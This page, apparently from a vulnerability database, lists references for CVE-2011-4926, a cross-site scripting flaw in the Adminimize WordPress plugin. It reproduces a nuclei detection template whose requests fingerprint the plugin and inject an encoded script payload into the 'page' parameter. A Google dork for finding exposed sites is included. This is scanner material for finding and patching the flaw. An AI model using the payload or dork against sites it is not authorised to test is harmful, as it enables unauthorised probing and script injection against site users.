Lucene search
K

Adminimize 1.7.22 - Cross-Site Scripting

🗓️ 12 Jun 2026 03:02:50Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Adminimize 1.7.22 - Cross-Site Scripting vulnerability in WordPress plugin

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2011-5128
29 Aug 201204:39
attackerkb
Circl
CVE-2011-4926
21 Nov 201100:00
circl
CVE
CVE-2011-4926
29 Aug 201201:00
cve
Cvelist
CVE-2011-4926
29 Aug 201201:00
cvelist
EUVD
EUVD-2011-4836
7 Oct 202500:30
euvd
NVD
CVE-2011-4926
29 Aug 201204:39
nvd
Patchstack
WordPress Adminimize Plugin 1.7.21 - Cross Site Scripting
21 Nov 201100:00
patchstack
Prion
Cross site scripting
29 Aug 201204:39
prion
Prion
Cross site scripting
29 Aug 201204:39
prion
RedhatCVE
CVE-2011-5128
22 May 202501:48
redhatcve
Rows per page
id: CVE-2011-4926

info:
  name: Adminimize 1.7.22 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4926
    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
    - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
    - http://www.openwall.com/lists/oss-security/2012/01/10/9
    - http://wordpress.org/extend/plugins/adminimize/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-4926
    cwe-id: CWE-79
    epss-score: 0.03108
    epss-percentile: 0.87108
    cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bueltge
    product: adminimize
    google-query: "inurl:\"/wp-content/plugins/adminimize/\""
  tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge,vkev,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Adminimize ==='

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d3c1185afa195f1eea0e47dd52f4e7ac4dd24af8b272fd6a399782e458ae362602202b6c744a0a06fdf9e9d4ee907847d4184d9b1aa8b9de6add87d0f5b5b2fef1b0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.03108
16